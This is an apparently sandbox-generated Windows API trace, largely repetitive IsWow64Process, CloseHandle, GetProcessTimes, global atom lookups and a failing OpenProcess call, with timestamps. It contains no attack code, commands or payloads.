	[0130.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.264] CloseHandle (hObject=0x2dc) returned 1
	[0130.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.264] CloseHandle (hObject=0x2dc) returned 1
	[0130.265] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.265] CloseHandle (hObject=0x2dc) returned 1
	[0130.265] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.265] CloseHandle (hObject=0x2dc) returned 1
	[0130.265] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.265] CloseHandle (hObject=0x2dc) returned 1
	[0130.265] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.265] CloseHandle (hObject=0x2dc) returned 1
	[0130.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.266] CloseHandle (hObject=0x2dc) returned 1
	[0130.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.266] CloseHandle (hObject=0x2dc) returned 1
	[0130.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.266] CloseHandle (hObject=0x2dc) returned 1
	[0130.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.267] CloseHandle (hObject=0x2dc) returned 1
	[0130.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.267] CloseHandle (hObject=0x2dc) returned 1
	[0130.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.267] CloseHandle (hObject=0x2dc) returned 1
	[0130.268] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.268] CloseHandle (hObject=0x2dc) returned 1
	[0130.268] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.268] CloseHandle (hObject=0x2dc) returned 1
	[0130.268] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.269] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.269] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.269] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.269] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.269] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.269] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.270] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.270] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.270] CloseHandle (hObject=0x2dc) returned 1
	[0130.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.270] CloseHandle (hObject=0x2dc) returned 1
	[0130.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.270] CloseHandle (hObject=0x2dc) returned 1
	[0130.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.270] CloseHandle (hObject=0x2dc) returned 1
	[0130.271] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.271] CloseHandle (hObject=0x2dc) returned 1
	[0130.271] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.271] CloseHandle (hObject=0x2dc) returned 1
	[0130.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.305] CloseHandle (hObject=0x2dc) returned 1
	[0130.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.305] CloseHandle (hObject=0x2dc) returned 1
	[0130.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.305] CloseHandle (hObject=0x2dc) returned 1
	[0130.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.306] CloseHandle (hObject=0x2dc) returned 1
	[0130.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.306] CloseHandle (hObject=0x2dc) returned 1
	[0130.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.306] CloseHandle (hObject=0x2dc) returned 1
	[0130.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.306] CloseHandle (hObject=0x2dc) returned 1
	[0130.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.306] CloseHandle (hObject=0x2dc) returned 1
	[0130.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.307] CloseHandle (hObject=0x2dc) returned 1
	[0130.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.307] CloseHandle (hObject=0x2dc) returned 1
	[0130.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.307] CloseHandle (hObject=0x2dc) returned 1
	[0130.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.307] CloseHandle (hObject=0x2dc) returned 1
	[0130.308] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.308] CloseHandle (hObject=0x2dc) returned 1
	[0130.308] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.308] CloseHandle (hObject=0x2dc) returned 1
	[0130.308] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.308] CloseHandle (hObject=0x2dc) returned 1
	[0130.308] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.308] CloseHandle (hObject=0x2dc) returned 1
	[0130.309] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.309] CloseHandle (hObject=0x2dc) returned 1
	[0130.309] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.309] CloseHandle (hObject=0x2dc) returned 1
	[0130.309] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.309] CloseHandle (hObject=0x2dc) returned 1
	[0130.309] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.309] CloseHandle (hObject=0x2dc) returned 1
	[0130.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.310] CloseHandle (hObject=0x2dc) returned 1
	[0130.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.310] CloseHandle (hObject=0x2dc) returned 1
	[0130.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.310] CloseHandle (hObject=0x2dc) returned 1
	[0130.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.310] CloseHandle (hObject=0x2dc) returned 1
	[0130.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.310] CloseHandle (hObject=0x2dc) returned 1
	[0130.311] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.311] CloseHandle (hObject=0x2dc) returned 1
	[0130.311] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.311] CloseHandle (hObject=0x2dc) returned 1
	[0130.311] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.311] CloseHandle (hObject=0x2dc) returned 1
	[0130.311] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.311] CloseHandle (hObject=0x2dc) returned 1
	[0130.312] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.312] CloseHandle (hObject=0x2dc) returned 1
	[0130.312] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.312] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.312] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.313] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.313] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.313] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.313] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.313] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.313] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.314] CloseHandle (hObject=0x2dc) returned 1
	[0130.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.314] CloseHandle (hObject=0x2dc) returned 1
	[0130.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.314] CloseHandle (hObject=0x2dc) returned 1
	[0130.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.314] CloseHandle (hObject=0x2dc) returned 1
	[0130.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.315] CloseHandle (hObject=0x2dc) returned 1
	[0130.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.315] CloseHandle (hObject=0x2dc) returned 1
	[0130.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.349] CloseHandle (hObject=0x2dc) returned 1
	[0130.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.349] CloseHandle (hObject=0x2dc) returned 1
	[0130.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.349] CloseHandle (hObject=0x2dc) returned 1
	[0130.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.349] CloseHandle (hObject=0x2dc) returned 1
	[0130.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.350] CloseHandle (hObject=0x2dc) returned 1
	[0130.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.350] CloseHandle (hObject=0x2dc) returned 1
	[0130.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.350] CloseHandle (hObject=0x2dc) returned 1
	[0130.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.350] CloseHandle (hObject=0x2dc) returned 1
	[0130.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.350] CloseHandle (hObject=0x2dc) returned 1
	[0130.351] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.351] CloseHandle (hObject=0x2dc) returned 1
	[0130.351] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.351] CloseHandle (hObject=0x2dc) returned 1
	[0130.351] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.351] CloseHandle (hObject=0x2dc) returned 1
	[0130.351] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.351] CloseHandle (hObject=0x2dc) returned 1
	[0130.352] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.352] CloseHandle (hObject=0x2dc) returned 1
	[0130.352] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.352] CloseHandle (hObject=0x2dc) returned 1
	[0130.352] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.352] CloseHandle (hObject=0x2dc) returned 1
	[0130.352] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.352] CloseHandle (hObject=0x2dc) returned 1
	[0130.353] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.353] CloseHandle (hObject=0x2dc) returned 1
	[0130.353] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.353] CloseHandle (hObject=0x2dc) returned 1
	[0130.353] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.353] CloseHandle (hObject=0x2dc) returned 1
	[0130.353] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.353] CloseHandle (hObject=0x2dc) returned 1
	[0130.354] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.354] CloseHandle (hObject=0x2dc) returned 1
	[0130.354] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.354] CloseHandle (hObject=0x2dc) returned 1
	[0130.354] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.354] CloseHandle (hObject=0x2dc) returned 1
	[0130.354] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.354] CloseHandle (hObject=0x2dc) returned 1
	[0130.355] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.355] CloseHandle (hObject=0x2dc) returned 1
	[0130.355] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.355] CloseHandle (hObject=0x2dc) returned 1
	[0130.355] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.355] CloseHandle (hObject=0x2dc) returned 1
	[0130.355] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.355] CloseHandle (hObject=0x2dc) returned 1
	[0130.356] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.356] CloseHandle (hObject=0x2dc) returned 1
	[0130.356] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.356] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.356] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.357] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.357] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.357] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.357] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.357] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.357] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.357] CloseHandle (hObject=0x2dc) returned 1
	[0130.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.358] CloseHandle (hObject=0x2dc) returned 1
	[0130.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.358] CloseHandle (hObject=0x2dc) returned 1
	[0130.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.358] CloseHandle (hObject=0x2dc) returned 1
	[0130.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.358] CloseHandle (hObject=0x2dc) returned 1
	[0130.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.359] CloseHandle (hObject=0x2dc) returned 1
	[0130.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.392] CloseHandle (hObject=0x2dc) returned 1
	[0130.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.392] CloseHandle (hObject=0x2dc) returned 1
	[0130.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.392] CloseHandle (hObject=0x2dc) returned 1
	[0130.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.393] CloseHandle (hObject=0x2dc) returned 1
	[0130.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.393] CloseHandle (hObject=0x2dc) returned 1
	[0130.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.393] CloseHandle (hObject=0x2dc) returned 1
	[0130.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.393] CloseHandle (hObject=0x2dc) returned 1
	[0130.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.394] CloseHandle (hObject=0x2dc) returned 1
	[0130.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.394] CloseHandle (hObject=0x2dc) returned 1
	[0130.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.394] CloseHandle (hObject=0x2dc) returned 1
	[0130.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.394] CloseHandle (hObject=0x2dc) returned 1
	[0130.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.395] CloseHandle (hObject=0x2dc) returned 1
	[0130.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.395] CloseHandle (hObject=0x2dc) returned 1
	[0130.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.395] CloseHandle (hObject=0x2dc) returned 1
	[0130.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.395] CloseHandle (hObject=0x2dc) returned 1
	[0130.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.396] CloseHandle (hObject=0x2dc) returned 1
	[0130.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.396] CloseHandle (hObject=0x2dc) returned 1
	[0130.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.396] CloseHandle (hObject=0x2dc) returned 1
	[0130.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.396] CloseHandle (hObject=0x2dc) returned 1
	[0130.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.397] CloseHandle (hObject=0x2dc) returned 1
	[0130.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.397] CloseHandle (hObject=0x2dc) returned 1
	[0130.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.397] CloseHandle (hObject=0x2dc) returned 1
	[0130.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.397] CloseHandle (hObject=0x2dc) returned 1
	[0130.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.397] CloseHandle (hObject=0x2dc) returned 1
	[0130.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.398] CloseHandle (hObject=0x2dc) returned 1
	[0130.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.398] CloseHandle (hObject=0x2dc) returned 1
	[0130.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.398] CloseHandle (hObject=0x2dc) returned 1
	[0130.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.398] CloseHandle (hObject=0x2dc) returned 1
	[0130.399] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.399] CloseHandle (hObject=0x2dc) returned 1
	[0130.399] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.399] CloseHandle (hObject=0x2dc) returned 1
	[0130.399] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.399] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.399] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.400] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.400] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.400] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.400] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.400] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.400] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.401] CloseHandle (hObject=0x2dc) returned 1
	[0130.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.401] CloseHandle (hObject=0x2dc) returned 1
	[0130.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.401] CloseHandle (hObject=0x2dc) returned 1
	[0130.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.401] CloseHandle (hObject=0x2dc) returned 1
	[0130.402] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.402] CloseHandle (hObject=0x2dc) returned 1
	[0130.402] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.402] CloseHandle (hObject=0x2dc) returned 1
	[0130.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.434] CloseHandle (hObject=0x2dc) returned 1
	[0130.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.435] CloseHandle (hObject=0x2dc) returned 1
	[0130.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.435] CloseHandle (hObject=0x2dc) returned 1
	[0130.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.435] CloseHandle (hObject=0x2dc) returned 1
	[0130.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.435] CloseHandle (hObject=0x2dc) returned 1
	[0130.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.436] CloseHandle (hObject=0x2dc) returned 1
	[0130.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.436] CloseHandle (hObject=0x2dc) returned 1
	[0130.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.436] CloseHandle (hObject=0x2dc) returned 1
	[0130.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.436] CloseHandle (hObject=0x2dc) returned 1
	[0130.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.437] CloseHandle (hObject=0x2dc) returned 1
	[0130.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.437] CloseHandle (hObject=0x2dc) returned 1
